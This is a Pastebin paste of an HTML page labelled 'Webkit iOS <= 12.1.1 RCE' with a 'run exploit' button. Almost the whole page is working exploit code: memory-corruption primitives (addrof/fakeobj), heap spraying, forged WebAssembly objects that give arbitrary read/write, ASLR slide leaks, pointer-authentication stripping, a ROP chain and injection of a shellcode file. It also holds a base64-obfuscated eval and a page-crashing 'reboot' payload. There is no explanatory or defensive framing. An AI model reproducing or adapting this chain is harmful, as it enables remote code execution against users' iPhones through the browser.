SHARE
TWEET

Untitled

a guest Mar 20th, 2019 67 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1, minumum-scale=1, maximum-scale=1, user-scalable=no">
		<title>PWN</title>
		<link rel="stylesheet" type="text/css" href="style.css"/>
		<script type="text/javascript" src="offsets.js"></script>
		<script type="text/javascript" src="utils.js"></script>
		<script type="text/javascript" src="int64.js"></script>
		<script type="text/javascript">

			try {
				// We want a buffer to write our shellcode + ropchain in
				var BASE32 = 0x100000000;
				var conversion_buffer = new ArrayBuffer(8);
				var f64 = new Float64Array(conversion_buffer);
				var f32 = new Float32Array(conversion_buffer);
				var i32 = new Uint32Array(conversion_buffer);
				var i16 = new Uint16Array(conversion_buffer);
				var i8 = new Uint8Array(conversion_buffer);

				var workbuf = new ArrayBuffer(0x1000000);
				var f32_buffer = new Float32Array(workbuf);
				var f64_buffer = new Float64Array(workbuf);
				var u32_buffer = new Uint32Array(workbuf);
				var u16_buffer = new Uint16Array(workbuf);
				var u8_buffer = new Uint8Array(workbuf);
				var i32_buffer = new Int32Array(workbuf);
				var i16_buffer = new Int16Array(workbuf);
				var i8_buffer = new Int8Array(workbuf);

				var pages = [];
				for(i = 0; i < 250; i++)
				{
					pages.push(new ArrayBuffer(0x4000));
				}

				for(i = 250; i > 0; i--)
				{
					pages[i] = undefined;
				}

				pages = undefined;

				window.onload = function()
				{

					window.disableBtn = function(id = "#btn")
					{
						setTimeout(function(){
							var btn = document.querySelector(id);
							btn.setAttribute('class','disabled');
							btn.setAttribute('disabled','true');
							btn.backup = btn.onclick;
							btn.onclick = function(){};
						}, 0.01);
					};

					window.enableBtn = function(id = "#btn")
					{
						setTimeout(function(){
							var btn = document.querySelector(id);
							btn.setAttribute('class','disabled');
							btn.removeAttribute('disabled');
							btn.onclick = btn.backup;
							btn.backup = undefined;
						}, 0.01);
					};

					window.updateStatus = function(msg = '', id = "#btn")
					{
						if(!msg && !window.status)
						{
							window.status = "run exploit";
						}

						if(msg)
						{
							window.status = msg;
						}
						var btn = document.querySelector(id);
						btn.innerText = window.status;
						millis(2);
					};


					window.reboot = function()
					{
						disableBtn("#reboot");
						updateStatus("Rebooting, please wait...");
						millis(100);
						var reboot_payload = new TextDecoder().decode(load_shellcode('reboot.bin').u8);
						window.reboot_notthread = setInterval(function(){
							document.write(reboot_payload);
						}, 10);
						setTimeout(function(){clearInterval(window.reboot_notthread);}, 10000);
						
					}

					window.respring = function()
					{
						disableBtn("#respring");
						updateStatus("Respringing, please wait...");
						millis(10);
						eval(atob("d2luZG93LmxvY2F0aW9uLmhyZWY9J2FwcGxlcHJpbnRjZW50ZXI6Ly8nOw=="));
					}

					SupportTarget("iPhone 6S", 12.01, "any"); // We currently only support the iPhone 6S on 12.0.1

					if(!issupported()) // Mimic Obj-C button is disabled behaviour for unsupported devices
					{
						var btn = document.querySelector("#btn");
						btn.innerText = "unsupported";
						btn.setAttribute('class','unsupported');
						btn.onclick = function(){alert('Your device is not supported');};
						disableBtn("#respring");
						disableBtn("#reboot");
					}

					assert_offsets();

				};
				

				// Prepare our exploit
				function init()
				{

					log.debug("Preparing exploit...\n");
					u32_buffer.set(load_shellcode('shellcode.bin').u32, 0x4000);
					alert("First 32-bit value of shellcode: "+hexify(u32_buffer[0x4000]));
					var prestage = {
						offsets: function()
						{
							return offsets[currentdevice.os.version][currentdevice.device[0]];
						}() // Behave like ANSI C's __attribute__((constructor))
					}
				return prestage;
			};


			// Our exploit memory primitives
			var primitives = {

				// Leaks the address of an object
				addrof: function(obj)
				{
					var _addrof = function(val)
					{
						var array = [13.37];
				    	var reg = /abc/y;
				    
					    function getarray() {
					        return array;
					    }
				    
					    // Target function
					    var AddrGetter = function(array) {
					        for (var i = 2; i < array.length; i++) {
					            if (num % i === 0) {
					                return false;
					            }
					        }
					        
					        array = getarray();
					        reg[Symbol.match](val === null);
					        return array[0];
					    }
				    
					    // Force optimization
					    for (var i = 0; i < 100000; ++i)
					        AddrGetter(array);
				    
					    // Setup haxx
					    regexLastIndex = {};
					    regexLastIndex.toString = function() {
					        array[0] = val;
					        return "0";
					    };
				    	reg.lastIndex = regexLastIndex;
				    
					    // Do it!
					    return AddrGetter(array);
					};

					for(i = 0; i < 100; i++)
					{
						var r = _addrof(obj);
						if(typeof r != "object" && r !== 13.37)
						{
							return r;
						}
					}
					log.warn("Failed to leak address, we may crash...");
					disableBtn();
					
				},

				// Fakes anything to be an object we can operate on
				fakeobj: function(val)
				{
					function _fakeobj(val) {
					    var array = [13.37];
					    var reg = /abc/y;
					    
					    function getarray() {
					        return array;
					    }
					    
					    // Target function
					    var ObjFaker = function(array) {
					        for (var i = 2; i < array.length; i++) {
					            if (num % i === 0) {
					                return false;
					            }
					        }
					        
					        array = getarray();
					        reg[Symbol.match](val === null);
					        array[0] = val;
					    }
					    
					    // Force optimization
					    for (var i = 0; i < 100000; ++i)
					        ObjFaker(array);
					    
					    // Setup haxx
					    regexLastIndex = {};
					    regexLastIndex.toString = function() {
					        array[0] = {};
					        return "0";
					    };
					    reg.lastIndex = regexLastIndex;
					    
					    // Do it!
					    var unused = ObjFaker(array);
					    
					    return array[0];
					}
					for (var i = 0; i < 1000; i++) {
				    	var result = _fakeobj(val);
				   		if (typeof result == "object"){
				        	return result;
				    	}
					}
				}
			};

			var	stage1 = function() {
				// Spray Float64Array structures so that structure ID 0x5000 will
			    // be a Float64Array with very high probability
			    // We spray Float64Array first because it's faster
			    var structs = [];
			    for (var i = 0; i < 0x5000; i++) {
			        var a = new Float64Array(1);
			        a['prop' + i] = 1337;
			        structs.push(a);
			    }

			    // Now spray WebAssembly.Memory
			    for (var i = 0; i < 50; i++) {
			        var a = new WebAssembly.Memory({inital: 0});
			        a['prop' + i] = 1337;
			        structs.push(a);
			    }
			    
			   	// Our WASM module code
		    	var webAssemblyCode = '\x00asm\x01\x00\x00\x00\x01\x0b\x02`\x01\x7f\x01\x7f`\x02\x7f\x7f\x00\x02\x10\x01\x07imports\x03mem\x02\x00\x02\x03\x07\x06\x00\x01\x00\x01\x00\x01\x07D\x06\x08read_i32\x00\x00\twrite_i32\x00\x01\x08read_i16\x00\x02\twrite_i16\x00\x03\x07read_i8\x00\x04\x08write_i8\x00\x05\nF\x06\x0b\x00 \x00A\x04l(\x02\x00\x0f\x0b\x0c\x00 \x00A\x04l \x016\x02\x00\x0b\x0b\x00 \x00A\x02l/\x01\x00\x0f\x0b\x0c\x00 \x00A\x02l \x01;\x01\x00\x0b\x08\x00 \x00-\x00\x00\x0f\x0b\t\x00 \x00 \x01:\x00\x00\x0b';
		   
			   	// Convert the module to an arraybuffer
			    var webAssemblyBuffer = str2ab(webAssemblyCode);

			    //Assemble the Wasm module
			    var webAssemblyModule = new WebAssembly.Module(webAssemblyBuffer);

			    var jsCellHeader = new Int64([
			        0x00, 0x50, 0x00, 0x00, // m_structureID
			        0x0,                    // m_indexingType
			        0x2c,                   // m_type
			        0x08,                   // m_flags
			        0x1                     // m_cellState
			    ]);
			    
			    var wasmBuffer = {
			        jsCellHeader: jsCellHeader.asJSValue(),
			        butterfly: null,
			        vector: null,
			        memory: null,
			        deleteMe: null
			    };
			    
			    var wasmInternalMemory = {
			        jsCellHeader: null,
			        memoryToRead: {}, 
			        sizeToRead: (new Int64('0x0FFFFFFFFFFFFFFF')).asJSValue(), // Something large enough
			        size: (new Int64('0x0FFFFFFFFFFFFFFF')).asJSValue(), // Something large enough
			        initialSize: (new Int64('0x0FFFFFFFFFFFFFFF')).asJSValue(), // Something large enough
			        junk1: null,
			        junk2: null,
			        junk3: null,
			        junk4: null,
			        junk5: null,
			    };
			    
			    var leaker = {
			        objectToLeak: null
			    };
			    
			    delete wasmBuffer.butterfly;
			    delete wasmBuffer.vector;
			    delete wasmBuffer.deleteMe;
			    delete wasmInternalMemory.junk1;
			    delete wasmInternalMemory.junk2;
			    delete wasmInternalMemory.junk3;
			    delete wasmInternalMemory.junk4;
			    delete wasmInternalMemory.junk5;

			    var realWasmMem = new WebAssembly.Memory({inital: 0x1});

			    var wasmBufferRawAddr = primitives.addrof(wasmBuffer);
			    var wasmBufferAddr = Add(Int64.fromDouble(wasmBufferRawAddr), 16);
			    

			    log.info("Fake Wasm Memory @ " + wasmBufferAddr);
			    
			    var fakeWasmBuffer = primitives.fakeobj(wasmBufferAddr.asDouble());
			    while (!(fakeWasmBuffer instanceof WebAssembly.Memory)) {
			        jsCellHeader.assignAdd(jsCellHeader, Int64.One);
			        wasmBuffer.jsCellHeader = jsCellHeader.asJSValue();
			    }
			    
			    var wasmMemRawAddr = primitives.addrof(wasmInternalMemory);
			    var wasmMemAddr = Add(Int64.fromDouble(wasmMemRawAddr), 16);
			    log.info("Fake Wasm Internal Memory @ " + wasmMemAddr);
			    var wasmMem = primitives.fakeobj(wasmMemAddr.asDouble());
			    
			    wasmBuffer.memory = wasmMem;
			    
			    var importObject = {
			        imports: {
			            mem: fakeWasmBuffer
			        }
			    };

			    function read_i64(readingFunc, offset) {
			        var low = readingFunc(offset * 4);
			        var midLow = readingFunc((offset * 4) + 1);
			        var midHigh = readingFunc((offset * 4) + 2);
			        var high = readingFunc((offset * 4) + 3);
			        return Add(ShiftLeft(Add(ShiftLeft(Add(ShiftLeft(high, 2), midHigh), 2), midLow), 2), low);
			    }
			    
			    function write_i64(writingFunc, offset, value) {
			        writingFunc(offset * 4, ShiftRight(value, 0).asInt16());
			        writingFunc((offset * 4) + 1, ShiftRight(value, 2).asInt16());
			        writingFunc((offset * 4) + 2, ShiftRight(value, 4).asInt16());
			        writingFunc((offset * 4) + 3, ShiftRight(value, 6).asInt16());
			    }
			    
			    // Create writer from Object
			    function createObjWriter(obj) {
			        wasmInternalMemory.memoryToRead = obj;
			        var module = new WebAssembly.Instance(webAssemblyModule, importObject);
			        return {read_i8: module.exports.read_i8, write_i8: module.exports.write_i8, read_i16: module.exports.read_i16, write_i16: module.exports.write_i16, read_i32: module.exports.read_i32, write_i32: module.exports.write_i32, read_i64: read_i64.bind(null, module.exports.read_i16), write_i64: write_i64.bind(null, module.exports.write_i16), module: module}
			    }
			    
			    var fakeWasmInternalBufferWriter = createObjWriter(wasmMem);
			    var wasmInternalBufferWriter = fakeWasmInternalBufferWriter;
			    
			    // Create writer from address
			    function createDirectWriter(address) {
			        wasmInternalBufferWriter.write_i64(1, address);
			        var module = new WebAssembly.Instance(webAssemblyModule, importObject);
			        return {read_i8: module.exports.read_i8, write_i8: module.exports.write_i8, read_i16: module.exports.read_i16, write_i16: module.exports.write_i16, read_i32: module.exports.read_i32, write_i32: module.exports.write_i32, read_i64: read_i64.bind(null, module.exports.read_i16), write_i64: write_i64.bind(null, module.exports.write_i16), module: module}
			    }
			   // Now edit our real Wasm memory
			    var realWasmWriter = createObjWriter(realWasmMem);
			    var realWasmInternalMemAddr = realWasmWriter.read_i64(3);

			    log.info("Real Wasm Internal Memory @ " + realWasmInternalMemAddr);
			    wasmInternalBufferWriter = createDirectWriter(realWasmInternalMemAddr);

			    // Create an object leaker
			    var leakerWriter = createObjWriter(leaker);
			    
			    // Set sizes to large values
			    wasmInternalBufferWriter.write_i64(2, new Int64('0x0FFFFFFFFFFFFFFF'));
			    wasmInternalBufferWriter.write_i64(3, new Int64('0x0FFFFFFFFFFFFFFF'));
			    wasmInternalBufferWriter.write_i64(4, new Int64('0x0FFFFFFFFFFFFFFF'));
			    var realInternalBufferAddr = wasmInternalBufferWriter.read_i64(1);
			    importObject.imports.mem = realWasmMem;

				primitives.addrof = function(obj) {
			        leaker.objectToLeak = obj;
			        return leakerWriter.read_i64(2);
			    };

			    primitives.fakeobj = function(addr) {
			        leakerWriter.write_i64(2, addr);
			        return leaker.objectToLeak;
			    };

			     // And createObjWriter
			    primitives.createObjWriter = function(obj) 
			    {

			       	return createDirectWriter(primitives.addrof(obj));
			    };

			    log.info("Cleaning up stage 1, this may take a while.");
			    
			    millis(100); // Sleep 100ms
			    
			    var writer = primitives.createObjWriter(wasmMem);
			    writer.write_i64(0, Int64.One);

			    var wasmBufferWriter = primitives.createObjWriter(wasmBuffer);
			    var writer = primitives.createObjWriter(wasmInternalMemory);

			    wasmBufferWriter.write_i64(0, new Int64('0x0000000000000007')); // Don't know why this works, lol
			    wasmBufferWriter.write_i64(2, new Int64('0x0000000000000007'));
			    
			    writer.write_i64(4, Int64.Zero);
			    writer.write_i64(5, Int64.Zero);
			    writer.write_i64(6, Int64.Zero);
			    writer.write_i64(7, Int64.Zero);

			    writer.write_i64(0, new Int64('0x0000000000000007'));
			    writer.write_i64(2, new Int64('0x0000000000000007'));

				millis(1000); // Seems more stable with 1 second sleep
					    
				log.info("Cleanup complete. Crafting primitives.");
					  	
				var newprimitives = {};
			    newprimitives.create_writer = function(addrObj) {
			        if (addrObj instanceof Int64) {
			            var writer = createDirectWriter(addrObj);
			            return writer;
			        } else {
			            var writer = createObjWriter(addrObj);
			            return writer;
			        }
			    };
			    newprimitives.read_i64 = function(addrObj, offset) {
			            var writer = newprimitives.create_writer(addrObj);
			            return writer.read_i64(offset);
			    };
			    newprimitives.write_i64 = function(addrObj, offset, value) {
			        var writer = newprimitives.create_writer(addrObj);
			        writer.write_i64(offset, value);
			    };

			    newprimitives.write_non_zero = function(where, values)
			    {
			    	for(var i = 0; i < values.length; ++i)
			    	{
			    		if(values[i] != 0)
			    		{
			    			newprimitives.write_i64(Add(where,i*8),0, values[i]);
			    		}
			    	}
			    };

			    newprimitives.read_i32 = function(addrObj, offset) {
			        var writer = newprimitives.create_writer(addrObj);
			        return new Int64(writer.read_i32(offset));
			    };
			    newprimitives.write_i32 = function(addrObj, offset, value) {
			        var writer = newprimitives.create_writer(addrObj);
			        writer.write_i32(offset, value);
			    };
			    newprimitives.read_i8 = function(addrObj, offset) {
			        var writer = newprimitives.create_writer(addrObj);
			        return writer.read_i8(offset);
			    };
			    newprimitives.write_i8 = function(addrObj, offset, value) {
			        var writer = newprimitives.create_writer(addrObj);
			        writer.write_i8(offset, value);
			    };
			    newprimitives.copyto = function(addrObj, offset, data, length) {
			        var writer = newprimitives.create_writer(addrObj);
			        for (var i = 0; i < length; i++) {
			            writer.write_i8(offset + i, data[i]);
			        }
			    };
			    newprimitives.copyfrom = function(addrObj, offset, length) {
			        var writer = newprimitives.create_writer(addrObj);
			        var arr = new Uint8Array(length);
			        for (var i = 0; i < length; i++) {
			            arr[i] = writer.read_i8(offset + i);
			        }
			        return arr;
			    };
			    newprimitives.addrof = window.primitives.addrof;
			    newprimitives.fakeobj = window.primitives.fakeobj;
			    log.info("Got stable Memory R/W");
			    window.primitives = newprimitives;
			    return true;
			};


			var stage2 = function(_off) 
			{
				var primitives = window.primitives;

				/*
				 * Function to see if the device has Control Flow Integrity (A12+)
				*/
		    	var hasPAC = function() {
			        var sinFuncAddr = primitives.addrof(Math.sin);
			        var executableAddr = primitives.read_i64(sinFuncAddr, 3);
			        var jitCodeAddr = primitives.read_i64(executableAddr, 3);
			        var rxMemAddr = primitives.read_i64(jitCodeAddr, 4);
			        if (ShiftRight(rxMemAddr, 5) == 0) {
			            return false; //iOS Pointer from Shared Library cache without PAC
			        }
			        return true; // Must have PAC then, right?
			    };

			    if(hasPAC()){
					log.info("Detected device with CFI.");
				}
				else
				{
					log.debug("Detected device without CFI.");
				}

				/*
				 * Strip the Pointer Authentication Code from an address.
				*/
			    primitives.strippac = function(addr)
			    {
				    var _pac = hasPAC();
			    	return _pac ? And(addr, new Int64('0xFFFFFFFF8')) : addr;
			    };
			
				function getjitfunc()
			    {
				    var shf = makejitfunc();
				    var shf_addr = primitives.addrof(shf);
				    log.info("Shellcode function @ " + shf_addr);
				    var shfx_addr = primitives.read_i64(shf_addr, 3);
				    log.info("Executable instance @ "+ shfx_addr);
				    var shfc_addr = primitives.read_i64(shfx_addr, 3);
				    log.info("JITCode instance @ " + shfc_addr);
				    var shf_xregion = primitives.read_i64(shfc_addr, 4);
				    shf_xregion = primitives.strippac(shf_xregion);
				    log.info("Executable region @ " + shf_xregion); 
				    return [shf, shfc_addr, shf_xregion];
				};
				
				// This element is the element we target for leaking randomization and execution
				var wrapper = document.createElement('div');
				var el = primitives.read_i64(wrapper, FPO);
			   	log.info("Element @ 0x"+el);

				var nativejitcode = primitives.read_i64(el, 0);
				log.info("Got nativejitcode @ "+nativejitcode);
				dyld_cache_slide(_off.nativejitcode, nativejitcode);
				slide = dyld_cache_slide();
				
				log.info("Slide: "+ hexify(slide));
				
				var jitWriteSeparateHeapsFunctionAddr = slideaddr(_off.jit_writeseperateheaps_func);
				var jitWriteSeparateHeapsFunction = primitives.read_i64(jitWriteSeparateHeapsFunctionAddr, 0);
				var useFastPermisionsJITCopyAddr = slideaddr(_off.usefastpermissions_jitcopy);
				var useFastPermisionsJITCopy = primitives.read_i64(useFastPermisionsJITCopyAddr, 0);
				
				if (!useFastPermisionsJITCopy || jitWriteSeparateHeapsFunction) 
			    {
			    	log.info("Got an older device. We can use the legacy execution flow.");
			    }
			    else
			    {
			    	log.info("Got an iPhone 8 or up. We must use the modern execution flow.");
			    	var shf = getjitfunc();
			    	log.info("The flow for iPhone 8 and up needs to be finished due to changes in longjmp. We will jump to 0x41414141 as a demo.");
					primitives.write_i64(shf[1], 0, 0x4141414141414141);
					shf(); //asm: b 0x41414141
			    }

				log.debug("Finding the executable memorypool.");
				var startOfFixedExecutableMemoryPoolAddr = slideaddr(_off.startfixedmempool);
			   	var endOfFixedExecutableMemoryPoolAddr = slideaddr(_off.endfixedmempool);

			   	var startOfFixedExecutableMemoryPool = primitives.read_i64(startOfFixedExecutableMemoryPoolAddr, 0);
				var endOfFixedExecutableMemoryPool = Add(startOfFixedExecutableMemoryPool, (0x20000/2));

				var jscbase = slideaddr(_off.jscbase);
				var disablePrimitiveGigacage = slideaddr(_off.disableprimitivegigacage);

				var callbacks = primitives.read_i64(slideaddr(_off.callbacks), 0);
				var g_gigacageBasePtrs = slideaddr(_off.g_gigacagebaseptrs);

		    	var g_typedArrayPoisons = slideaddr(_off.g_jsarraybufferpoison);

		    	log.info('g_typedArrayPoisons: '+hexify(primitives.read_i64(g_typedArrayPoisons, 6*8)));

			   	var longjmp = slideaddr(_off.longjmp);
			    var dlsym = slideaddr(_off.dlsym);
			    var ptr_stack_chk_guard = slideaddr(_off.ptr_stack_check_guard);
				var linkcode_gadget = slideaddr(_off.linkcode_gadget);

				log.info(''
			        + '\nASLR Slide ' + hexify(slide) //dyld shared cache slide should be equal to the vtable infoleak minus the vtable offset
			        + '\nJavaScriptCore base @ ' + (jscbase == slide ? "Offset missing" : hexify(jscbase))
			        + '\ncallbacks @ ' + (callbacks == slide ? "Offset missing" : hexify(callbacks)) //callback vector
			        + '\nlongjmp @ ' + (longjmp == slide ? "Offset missing" : hexify(longjmp)) //symbol
			        + '\ndlsym @ ' + (dlsym == slide ? "Offset missing" : hexify(dlsym)) //dlsym symbol, used for referincing a symbol by string
			        + '\ndisablePrimitiveGigacage @ ' + (disablePrimitiveGigacage == slide ? "Offset missing" : hexify(disablePrimitiveGigacage)) //symbol
			        + '\ng_gigacageBasePtrs @ ' + (g_gigacageBasePtrs == slide ? "Offset missing" : hexify(g_gigacageBasePtrs)) //symbol
			        + '\nlinkCode gadget @ ' + (linkcode_gadget == slide ? "Offset missing" : hexify(linkcode_gadget)) //symbol, used in stage2
			        + '\njit_writeseperateheaps_func @ ' + (jitWriteSeparateHeapsFunctionAddr == slide ? "Offset missing" : hexify(jitWriteSeparateHeapsFunctionAddr))
			        + '\nuseFastPermisionsJITCopy @ ' +  (useFastPermisionsJITCopyAddr == slide ? "Offset missing" : hexify(useFastPermisionsJITCopyAddr))
			        + '\nstartfixedmempool @ ' + (startOfFixedExecutableMemoryPool == slide ? "Offset missing" : startOfFixedExecutableMemoryPool)
			        + '\nendfixedmempool @ ' + (endOfFixedExecutableMemoryPool == slide ? "Offset missing" : hexify(endOfFixedExecutableMemoryPool))
			        + '\nptr_stack_check_guard @ ' + (ptr_stack_chk_guard == slide ? "Offset missing" : hexify(ptr_stack_chk_guard))
			    );

				var pop_x8 = slideaddr(_off.modelio_popx8);
				log.info("pop_x8 gadget: "+hexify(pop_x8));

				var pop_x2 = slideaddr(_off.coreaudio_popx2);
				log.info("pop_x2 gadget: "+hexify(pop_x2));

				var buffer_addr = primitives.addrof(workbuf);
				log.info("Shellcode buffer @ " +buffer_addr);

				var shellcode_src = Add(buffer_addr, 0x4000);
				log.info("Shellcode @ " + shellcode_src);

				var shellcode_dst = endOfFixedExecutableMemoryPool;
				log.info("Shellcode target @ " + hexify(shellcode_dst));

				log.debug("Preparing shellcode with dlsym offset.");
				primitives.write_i64(shellcode_src, 4, dlsym);
				var fake_stack = [
			    		0,
			    		u32_buffer.byteLength, // x2
			    		0,

				    	pop_x8,

				    	0, 0, 0, 0, 0,
				    	shellcode_dst, // x8
				    	0, 0, 0, 0,
				    	primitives.read_i64(ptr_stack_chk_guard) + 0x58,

				    	linkcode_gadget,
				    	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
				        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,

				        shellcode_dst,
				];

				u32_buffer[0] = longjmp % BASE32;
				u32_buffer[1] = longjmp / BASE32;

				for(var i = 0; i < fake_stack.length; ++i)
				{
			    		u32_buffer[0x2000/4 + 2*i] = fake_stack[i] % BASE32
				        u32_buffer[0x2000/4 + 2*i+1] = fake_stack[i] / BASE32
				}

				primitives.write_i32(el, 0, buffer_addr);
				primitives.write_i32(el, 16, shellcode_src);
				primitives.write_i32(el, 64, pop_x2);
				primitives.write_i32(el, 80, Add(buffer_addr, 0x2000));

	//		   	primitives.copyto(el, 0, ropchain.buffer, ropchain.buffer.byteLength);

				return wrapper;
			}

			function go()
			{
				try
				{
					disableBtn();

					updateStatus('Initializing exploit...');
					var nothread_1 = setTimeout(function(){
						window.prestage = init();
						millis(100);
						updateStatus('Stage1...');
						var nothread_2 = setTimeout(function(){
								if(!stage1())
								{
									throw "Stage 1 has failed.";
								}
								millis(100);
								updateStatus('Stage2...');
								var nothread_3 = setTimeout(function(){
									var mach_swap = stage2(prestage.offsets);
									updateStatus('Executing payload...');
									millis(100);
									var nothread_4 = setTimeout(function(){
										mach_swap.addEventListener('click', function(){});
										millis(32000);
										updateStatus('Done.');
										millis(4);
										respring();
									}, 100);
							}, 100);
						}, 100);
					}, 100);
			
					//enableBtn();
				}
				catch(ex)
				{
					alert((ex.message || "No message") + "\n" + (ex.stack || "No callstack"));
					throw ex;
				}
			};
		} 
		catch(ex)
		{
			alert("The progam load contains a bug, here is the trace: "+ex.message+'\n'+ex.stack);
		}
		</script>
	</head>
	<body>
		<header>
			<h1>Webkit iOS <= 12.1.1 RCE</h1>
			<p>Thanks to Linus Henze, Niklas Baumstark, Luca Todesco and Ben Sparkes</p>
		</header>
		<main>
			<button id="btn" onclick="go()">run exploit</button>
			<br/>
			<button id="respring" onclick="respring()">respring</button>
			<br/>
			<button id="reboot" onclick="reboot()">reboot</button>
		</main>
		<footer>
			<p>
				NO RESPONSIBILITY IS HELD FOR ANY DAMAGE CAUSED BY THIS SCRIPT. THIS SCRIPT GAINS KERNEL CODE EXECUTION IN YOUR BROWSER. NO GUARANTEES EITHER. BY PRESSING GO YOU AGREE TO THESE TERMS.
			</p>
		</footer>
	</body>
</html>

RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top